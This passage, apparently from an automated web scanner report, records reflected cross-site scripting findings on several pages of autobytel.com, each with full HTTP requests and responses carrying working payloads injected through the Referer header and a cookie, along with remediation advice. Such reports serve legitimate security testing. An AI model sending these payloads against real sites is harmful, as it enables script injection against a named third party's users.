User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: TIME=%7Bts%20%272011%2D01%2D24%2017%3A06%3A34%27%7D; BDATALIST=Google%20Search%7Ef34b4%2D%2D%3E%3Cimg%20src%3Da%20onerror%3Dalert%28document%2Ecookie%29%3Ef067754e5c4; __utmz=47232823.1295903274.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/31; USER_UUID_VCH=427D3445%2DBFE0%2DBF1D%2D884FC154EC603416; Axxd=1; s_sq=%5B%5BB%5D%5D; PV_CT=2; cweb=JONQJVS10.4.128.176CKMMM; HOMEVERSION=2; AxData=; s_cc=true; COUNT=1; ID=13148%3BABTL; ENTERED_POSTAL_CODE_VCH=; s_vi=[CS]v1|269EF4F28501182F-60000108600B027D[CE]; __utma=47232823.1972730476.1295903274.1295903274.1295903274.1; __utmc=47232823; __utmb=47232823.1.10.1295903274;
Referer: http://www.google.com/search?hl=en&q=1156f"%3balert(1)//1427023b7d4

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
Server: Microsoft-IIS/7.0
Expires: Mon, 24 Jan 2011 23:57:48 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Mon, 24 Jan 2011 23:57:48 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: ENTERED_POSTAL_CODE_VCH=;expires=Wed, 16-Jan-2041 23:57:48 GMT;path=/
Set-Cookie: HOMEVERSION=2;path=/
Set-Cookie: QUICKPOLL=0%2C0%3B;expires=Wed, 16-Jan-2041 23:57:48 GMT;path=/
Set-Cookie: BDATALIST=Google%20Search%7Ef34b4%2D%2D%3E%3Cimg%20src%3Da%20onerror%3Dalert%28document%2Ecookie%29%3Ef067754e5c4%2CGoogle%20Search%7E1156f%22%3Balert%281%29%2F%2F1427023b7d4;path=/
Set-Cookie: PV_CT=3;path=/
Content-Length: 43633


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">


<!-- CWEB425 --><!-- www -->
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.org/schema/" xmlns:fb
...[SNIP]...
<img src=a onerror=alert(document.cookie)>f067754e5c4,Google Search~1156f";alert(1)//1427023b7d4";
           
           
           //Zane 2/11/10 - Recently Viewed
           
           
                       //Paul Koch 3/17/08 - add cpcID
           
       
           //Paul Koch 1/25/08 - add page request UUID
           s.prop40 = "489CBD33-C5FD-A9E1-3B3E20BC
...[SNIP]...

4.1911. http://www.autobytel.com/car-reviews.htm [Referer HTTP header]

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.autobytel.com
Path:   /car-reviews.htm

Issue detail

The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 42332"%3balert(1)//ab1593c27bb was submitted in the Referer HTTP header. This input was echoed as 42332";alert(1)//ab1593c27bb in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /car-reviews.htm HTTP/1.1
Host: www.autobytel.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: TIME=%7Bts%20%272011%2D01%2D24%2017%3A06%3A34%27%7D; BDATALIST=Google%20Search%7Ef34b4%2D%2D%3E%3Cimg%20src%3Da%20onerror%3Dalert%28document%2Ecookie%29%3Ef067754e5c4; __utmz=47232823.1295903274.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/31; USER_UUID_VCH=427D3445%2DBFE0%2DBF1D%2D884FC154EC603416; Axxd=1; s_sq=%5B%5BB%5D%5D; PV_CT=2; cweb=JONQJVS10.4.128.176CKMMM; HOMEVERSION=2; AxData=; s_cc=true; COUNT=1; ID=13148%3BABTL; ENTERED_POSTAL_CODE_VCH=; s_vi=[CS]v1|269EF4F28501182F-60000108600B027D[CE]; __utma=47232823.1972730476.1295903274.1295903274.1295903274.1; __utmc=47232823; __utmb=47232823.1.10.1295903274;
Referer: http://www.google.com/search?hl=en&q=42332"%3balert(1)//ab1593c27bb

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
Server: Microsoft-IIS/7.0
Expires: Mon, 24 Jan 2011 23:58:32 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Mon, 24 Jan 2011 23:58:32 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: ENTERED_POSTAL_CODE_VCH=;expires=Wed, 16-Jan-2041 23:58:31 GMT;path=/
Set-Cookie: HOMEVERSION=2;path=/
Set-Cookie: QUICKPOLL=0%2C0%3B;expires=Wed, 16-Jan-2041 23:58:31 GMT;path=/
Set-Cookie: BDATALIST=Google%20Search%7Ef34b4%2D%2D%3E%3Cimg%20src%3Da%20onerror%3Dalert%28document%2Ecookie%29%3Ef067754e5c4%2CGoogle%20Search%7E42332%22%3Balert%281%29%2F%2Fab1593c27bb;path=/
Set-Cookie: PV_CT=3;path=/
Content-Length: 49297


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">


<!-- CWEB425 --><!-- www -->
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.org/schema/" xmlns:fb
...[SNIP]...
<img src=a onerror=alert(document.cookie)>f067754e5c4,Google Search~42332";alert(1)//ab1593c27bb";
           
           
           //Zane 2/11/10 - Recently Viewed
           
           
                       //Paul Koch 3/17/08 - add cpcID
           
       
           //Paul Koch 1/25/08 - add page request UUID
           s.prop40 = "48A35AD4-BDD2-4B2E-EF829E03
...[SNIP]...

4.1912. http://www.autobytel.com/car-reviews.htm [Referer HTTP header]

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.autobytel.com
Path:   /car-reviews.htm

Issue detail

The value of the Referer HTTP header is copied into an HTML comment. The payload dd5d7--><img%20src%3da%20onerror%3dalert(1)>4bc6a57004c was submitted in the Referer HTTP header. This input was echoed as dd5d7--><img src=a onerror=alert(1)>4bc6a57004c in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.

Request

GET /car-reviews.htm HTTP/1.1
Host: www.autobytel.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: TIME=%7Bts%20%272011%2D01%2D24%2017%3A06%3A34%27%7D; BDATALIST=Google%20Search%7Ef34b4%2D%2D%3E%3Cimg%20src%3Da%20onerror%3Dalert%28document%2Ecookie%29%3Ef067754e5c4; __utmz=47232823.1295903274.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/31; USER_UUID_VCH=427D3445%2DBFE0%2DBF1D%2D884FC154EC603416; Axxd=1; s_sq=%5B%5BB%5D%5D; PV_CT=2; cweb=JONQJVS10.4.128.176CKMMM; HOMEVERSION=2; AxData=; s_cc=true; COUNT=1; ID=13148%3BABTL; ENTERED_POSTAL_CODE_VCH=; s_vi=[CS]v1|269EF4F28501182F-60000108600B027D[CE]; __utma=47232823.1972730476.1295903274.1295903274.1295903274.1; __utmc=47232823; __utmb=47232823.1.10.1295903274;
Referer: http://www.google.com/search?hl=en&q=dd5d7--><img%20src%3da%20onerror%3dalert(1)>4bc6a57004c

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
Server: Microsoft-IIS/7.0
Expires: Mon, 24 Jan 2011 23:58:48 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Mon, 24 Jan 2011 23:58:48 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: ENTERED_POSTAL_CODE_VCH=;expires=Wed, 16-Jan-2041 23:58:48 GMT;path=/
Set-Cookie: HOMEVERSION=2;path=/
Set-Cookie: QUICKPOLL=0%2C0%3B;expires=Wed, 16-Jan-2041 23:58:48 GMT;path=/
Set-Cookie: BDATALIST=Google%20Search%7Ef34b4%2D%2D%3E%3Cimg%20src%3Da%20onerror%3Dalert%28document%2Ecookie%29%3Ef067754e5c4%2CGoogle%20Search%7Edd5d7%2D%2D%3E%3Cimg%20src%3Da%20onerror%3Dalert%281%29%3E4bc6a57004c;path=/
Set-Cookie: PV_CT=3;path=/
Content-Length: 49335


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">


<!-- CWEB425 --><!-- www -->
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.org/schema/" xmlns:fb
...[SNIP]...
<!-- searchphrase: dd5d7--><img src=a onerror=alert(1)>4bc6a57004c -->
...[SNIP]...

4.1913. http://www.autobytel.com/content/buy/finance/index.cfm/action/Calculator [Referer HTTP header]

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.autobytel.com
Path:   /content/buy/finance/index.cfm/action/Calculator

Issue detail

The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in double quotation marks. The payload fa9c0"%3balert(1)//ee9bfa581b9 was submitted in the Referer HTTP header. This input was echoed as fa9c0";alert(1)//ee9bfa581b9 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /content/buy/finance/index.cfm/action/Calculator HTTP/1.1
Host: www.autobytel.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: TIME=%7Bts%20%272011%2D01%2D24%2017%3A06%3A34%27%7D; BDATALIST=Google%20Search%7Ef34b4%2D%2D%3E%3Cimg%20src%3Da%20onerror%3Dalert%28document%2Ecookie%29%3Ef067754e5c4; __utmz=47232823.1295903274.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/31; USER_UUID_VCH=427D3445%2DBFE0%2DBF1D%2D884FC154EC603416; Axxd=1; s_sq=%5B%5BB%5D%5D; PV_CT=2; cweb=JONQJVS10.4.128.176CKMMM; HOMEVERSION=2; AxData=; s_cc=true; COUNT=1; ID=13148%3BABTL; ENTERED_POSTAL_CODE_VCH=; s_vi=[CS]v1|269EF4F28501182F-60000108600B027D[CE]; __utma=47232823.1972730476.1295903274.1295903274.1295903274.1; __utmc=47232823; __utmb=47232823.1.10.1295903274;
Referer: http://www.google.com/search?hl=en&q=fa9c0"%3balert(1)//ee9bfa581b9

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
Server: Microsoft-IIS/7.0
Expires: Mon, 24 Jan 2011 23:37:27 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Mon, 24 Jan 2011 23:37:27 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: ENTERED_POSTAL_CODE_VCH=;expires=Wed, 16-Jan-2041 23:37:27 GMT;path=/
Set-Cookie: HOMEVERSION=2;path=/
Set-Cookie: QUICKPOLL=0%2C0%3B;expires=Wed, 16-Jan-2041 23:37:27 GMT;path=/
Set-Cookie: BDATALIST=Google%20Search%7Ef34b4%2D%2D%3E%3Cimg%20src%3Da%20onerror%3Dalert%28document%2Ecookie%29%3Ef067754e5c4%2CGoogle%20Search%7Efa9c0%22%3Balert%281%29%2F%2Fee9bfa581b9;path=/
Set-Cookie: PV_CT=3;path=/
Content-Length: 35892


<!-- begin: index.cfm -->


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">


<!-- CWEB425 --><!-- www -->
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengr
...[SNIP]...
<img src=a onerror=alert(document.cookie)>f067754e5c4,Google Search~fa9c0";alert(1)//ee9bfa581b9";
           
           
           //Zane 2/11/10 - Recently Viewed
           
           
                       //Paul Koch 3/17/08 - add cpcID
           
       
           //Paul Koch 1/25/08 - add page request UUID
           s.prop40 = "47E25BF7-C108-F67E-663CB354
...[SNIP]...

4.1914. http://www.autobytel.com/content/buy/finance/index.cfm/action/Calculator [Referer HTTP header]

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.autobytel.com
Path:   /content/buy/finance/index.cfm/action/Calculator

Issue detail

The value of the Referer HTTP header is copied into an HTML comment. The payload 4a9c0--><img%20src%3da%20onerror%3dalert(1)>128513abd15 was submitted in the Referer HTTP header. This input was echoed as 4a9c0--><img src=a onerror=alert(1)>128513abd15 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.

Request

GET /content/buy/finance/index.cfm/action/Calculator HTTP/1.1
Host: www.autobytel.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: TIME=%7Bts%20%272011%2D01%2D24%2017%3A06%3A34%27%7D; BDATALIST=Google%20Search%7Ef34b4%2D%2D%3E%3Cimg%20src%3Da%20onerror%3Dalert%28document%2Ecookie%29%3Ef067754e5c4; __utmz=47232823.1295903274.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/31; USER_UUID_VCH=427D3445%2DBFE0%2DBF1D%2D884FC154EC603416; Axxd=1; s_sq=%5B%5BB%5D%5D; PV_CT=2; cweb=JONQJVS10.4.128.176CKMMM; HOMEVERSION=2; AxData=; s_cc=true; COUNT=1; ID=13148%3BABTL; ENTERED_POSTAL_CODE_VCH=; s_vi=[CS]v1|269EF4F28501182F-60000108600B027D[CE]; __utma=47232823.1972730476.1295903274.1295903274.1295903274.1; __utmc=47232823; __utmb=47232823.1.10.1295903274;
Referer: http://www.google.com/search?hl=en&q=4a9c0--><img%20src%3da%20onerror%3dalert(1)>128513abd15

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
Server: Microsoft-IIS/7.0
Expires: Mon, 24 Jan 2011 23:37:35 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Mon, 24 Jan 2011 23:37:35 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: ENTERED_POSTAL_CODE_VCH=;expires=Wed, 16-Jan-2041 23:37:34 GMT;path=/
Set-Cookie: HOMEVERSION=2;path=/
Set-Cookie: QUICKPOLL=0%2C0%3B;expires=Wed, 16-Jan-2041 23:37:34 GMT;path=/
Set-Cookie: BDATALIST=Google%20Search%7Ef34b4%2D%2D%3E%3Cimg%20src%3Da%20onerror%3Dalert%28document%2Ecookie%29%3Ef067754e5c4%2CGoogle%20Search%7E4a9c0%2D%2D%3E%3Cimg%20src%3Da%20onerror%3Dalert%281%29%3E128513abd15;path=/
Set-Cookie: PV_CT=3;path=/
Content-Length: 35930


<!-- begin: index.cfm -->


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">


<!-- CWEB425 --><!-- www -->
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengr
...[SNIP]...
<!-- searchphrase: 4a9c0--><img src=a onerror=alert(1)>128513abd15 -->
...[SNIP]...

4.1915. http://www.autobytel.com/content/buy/index.cfm [Referer HTTP header]

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.autobytel.com
Path:   /content/buy/index.cfm

Issue detail

The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 1a138"%3balert(1)//294e4adfe8b was submitted in the Referer HTTP header. This input was echoed as 1a138";alert(1)//294e4adfe8b in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /content/buy/index.cfm HTTP/1.1
Host: www.autobytel.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: TIME=%7Bts%20%272011%2D01%2D24%2017%3A06%3A34%27%7D; BDATALIST=Google%20Search%7Ef34b4%2D%2D%3E%3Cimg%20src%3Da%20onerror%3Dalert%28document%2Ecookie%29%3Ef067754e5c4; __utmz=47232823.1295903274.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/31; USER_UUID_VCH=427D3445%2DBFE0%2DBF1D%2D884FC154EC603416; Axxd=1; s_sq=%5B%5BB%5D%5D; PV_CT=2; cweb=JONQJVS10.4.128.176CKMMM; HOMEVERSION=2; AxData=; s_cc=true; COUNT=1; ID=13148%3BABTL; ENTERED_POSTAL_CODE_VCH=; s_vi=[CS]v1|269EF4F28501182F-60000108600B027D[CE]; __utma=47232823.1972730476.1295903274.1295903274.1295903274.1; __utmc=47232823; __utmb=47232823.1.10.1295903274;
Referer: http://www.google.com/search?hl=en&q=1a138"%3balert(1)//294e4adfe8b

Response (redirected)

HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
Server: Microsoft-IIS/7.0
Expires: Mon, 24 Jan 2011 23:37:59 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Mon, 24 Jan 2011 23:37:59 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: ENTERED_POSTAL_CODE_VCH=;expires=Wed, 16-Jan-2041 23:37:58 GMT;path=/
Set-Cookie: HOMEVERSION=2;path=/
Set-Cookie: QUICKPOLL=0%2C0%3B;expires=Wed, 16-Jan-2041 23:37:58 GMT;path=/
Set-Cookie: BDATALIST=Google%20Search%7Ef34b4%2D%2D%3E%3Cimg%20src%3Da%20onerror%3Dalert%28document%2Ecookie%29%3Ef067754e5c4%2CGoogle%20Search%7E1a138%22%3Balert%281%29%2F%2F294e4adfe8b;path=/
Set-Cookie: PV_CT=3;path=/
Content-Length: 57772


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">


<!-- CWEB425 --><!-- www -->
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.org/schema/" xmlns:fb
...[SNIP]...
<img src=a onerror=alert(document.cookie)>f067754e5c4,Google Search~1a138";alert(1)//294e4adfe8b";
           
           
           //Zane 2/11/10 - Recently Viewed
           
           
                       //Paul Koch 3/17/08 - add cpcID
           
       
           //Paul Koch 1/25/08 - add page request UUID
           s.prop40 = "47E7341A-C3F0-8BC0-F023176D
...[SNIP]...

4.1916. http://www.autobytel.com/content/buy/index.cfm [Referer HTTP header]

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.autobytel.com
Path:   /content/buy/index.cfm

Issue detail

The value of the Referer HTTP header is copied into an HTML comment. The payload d4a1a--><img%20src%3da%20onerror%3dalert(1)>4a22cceb8c0 was submitted in the Referer HTTP header. This input was echoed as d4a1a--><img src=a onerror=alert(1)>4a22cceb8c0 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.

Request

GET /content/buy/index.cfm HTTP/1.1
Host: www.autobytel.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: TIME=%7Bts%20%272011%2D01%2D24%2017%3A06%3A34%27%7D; BDATALIST=Google%20Search%7Ef34b4%2D%2D%3E%3Cimg%20src%3Da%20onerror%3Dalert%28document%2Ecookie%29%3Ef067754e5c4; __utmz=47232823.1295903274.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/31; USER_UUID_VCH=427D3445%2DBFE0%2DBF1D%2D884FC154EC603416; Axxd=1; s_sq=%5B%5BB%5D%5D; PV_CT=2; cweb=JONQJVS10.4.128.176CKMMM; HOMEVERSION=2; AxData=; s_cc=true; COUNT=1; ID=13148%3BABTL; ENTERED_POSTAL_CODE_VCH=; s_vi=[CS]v1|269EF4F28501182F-60000108600B027D[CE]; __utma=47232823.1972730476.1295903274.1295903274.1295903274.1; __utmc=47232823; __utmb=47232823.1.10.1295903274;
Referer: http://www.google.com/search?hl=en&q=d4a1a--><img%20src%3da%20onerror%3dalert(1)>4a22cceb8c0

Response (redirected)

HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
Server: Microsoft-IIS/7.0
Expires: Mon, 24 Jan 2011 23:38:14 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Mon, 24 Jan 2011 23:38:14 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: ENTERED_POSTAL_CODE_VCH=;expires=Wed, 16-Jan-2041 23:38:14 GMT;path=/
Set-Cookie: HOMEVERSION=2;path=/
Set-Cookie: QUICKPOLL=0%2C0%3B;expires=Wed, 16-Jan-2041 23:38:14 GMT;path=/
Set-Cookie: BDATALIST=Google%20Search%7Ef34b4%2D%2D%3E%3Cimg%20src%3Da%20onerror%3Dalert%28document%2Ecookie%29%3Ef067754e5c4%2CGoogle%20Search%7Ed4a1a%2D%2D%3E%3Cimg%20src%3Da%20onerror%3Dalert%281%29%3E4a22cceb8c0;path=/
Set-Cookie: PV_CT=3;path=/
Content-Length: 57810


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">


<!-- CWEB425 --><!-- www -->
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.org/schema/" xmlns:fb
...[SNIP]...
<!-- searchphrase: d4a1a--><img src=a onerror=alert(1)>4a22cceb8c0 -->
...[SNIP]...

4.1917. http://www.autobytel.com/content/buy/warranty/index.cfm [Referer HTTP header]

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.autobytel.com
Path:   /content/buy/warranty/index.cfm

Issue detail

The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 3cf66"%3balert(1)//49f2510b4ff was submitted in the Referer HTTP header. This input was echoed as 3cf66";alert(1)//49f2510b4ff in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /content/buy/warranty/index.cfm HTTP/1.1
Host: www.autobytel.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: TIME=%7Bts%20%272011%2D01%2D24%2017%3A06%3A34%27%7D; BDATALIST=Google%20Search%7Ef34b4%2D%2D%3E%3Cimg%20src%3Da%20onerror%3Dalert%28document%2Ecookie%29%3Ef067754e5c4; __utmz=47232823.1295903274.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/31; USER_UUID_VCH=427D3445%2DBFE0%2DBF1D%2D884FC154EC603416; Axxd=1; s_sq=%5B%5BB%5D%5D; PV_CT=2; cweb=JONQJVS10.4.128.176CKMMM; HOMEVERSION=2; AxData=; s_cc=true; COUNT=1; ID=13148%3BABTL; ENTERED_POSTAL_CODE_VCH=; s_vi=[CS]v1|269EF4F28501182F-60000108600B027D[CE]; __utma=47232823.1972730476.1295903274.1295903274.1295903274.1; __utmc=47232823; __utmb=47232823.1.10.1295903274;
Referer: http://www.google.com/search?hl=en&q=3cf66"%3balert(1)//49f2510b4ff

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
Server: Microsoft-IIS/7.0
Content-Length: 39580
Expires: Mon, 24 Jan 2011 23:36:12 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Mon, 24 Jan 2011 23:36:12 GMT
Connection: close
Set-Cookie: ENTERED_POSTAL_CODE_VCH=;expires=Wed, 16-Jan-2041 23:36:12 GMT;path=/
Set-Cookie: HOMEVERSION=2;path=/
Set-Cookie: QUICKPOLL=0%2C0%3B;expires=Wed, 16-Jan-2041 23:36:12 GMT;path=/
Set-Cookie: BDATALIST=Google%20Search%7Ef34b4%2D%2D%3E%3Cimg%20src%3Da%20onerror%3Dalert%28document%2Ecookie%29%3Ef067754e5c4%2CGoogle%20Search%7E3cf66%22%3Balert%281%29%2F%2F49f2510b4ff;path=/
Set-Cookie: PV_CT=3;path=/


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">


<!-- CWEB425 --><!-- www -->
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.org/schema/" xmlns:fb
...[SNIP]...
<img src=a onerror=alert(document.cookie)>f067754e5c4,Google Search~3cf66";alert(1)//49f2510b4ff";
           
           
           //Zane 2/11/10 - Recently Viewed
           
           
                       //Paul Koch 3/17/08 - add cpcID
           
       
           //Paul Koch 1/25/08 - add page request UUID
           s.prop40 = "47D6E7A8-DA33-12C1-BDD5AD25
...[SNIP]...

4.1918. http://www.autobytel.com/content/buy/warranty/index.cfm [Referer HTTP header]

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.autobytel.com
Path:   /content/buy/warranty/index.cfm

Issue detail

The value of the Referer HTTP header is copied into an HTML comment. The payload 79d8a--><img%20src%3da%20onerror%3dalert(1)>d955c1d591b was submitted in the Referer HTTP header. This input was echoed as 79d8a--><img src=a onerror=alert(1)>d955c1d591b in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.

Request

GET /content/buy/warranty/index.cfm HTTP/1.1
Host: www.autobytel.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: TIME=%7Bts%20%272011%2D01%2D24%2017%3A06%3A34%27%7D; BDATALIST=Google%20Search%7Ef34b4%2D%2D%3E%3Cimg%20src%3Da%20onerror%3Dalert%28document%2Ecookie%29%3Ef067754e5c4; __utmz=47232823.1295903274.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/31; USER_UUID_VCH=427D3445%2DBFE0%2DBF1D%2D884FC154EC603416; Axxd=1; s_sq=%5B%5BB%5D%5D; PV_CT=2; cweb=JONQJVS10.4.128.176CKMMM; HOMEVERSION=2; AxData=; s_cc=true; COUNT=1; ID=13148%3BABTL; ENTERED_POSTAL_CODE_VCH=; s_vi=[CS]v1|269EF4F28501182F-60000108600B027D[CE]; __utma=47232823.1972730476.1295903274.1295903274.1295903274.1; __utmc=47232823; __utmb=47232823.1.10.1295903274;
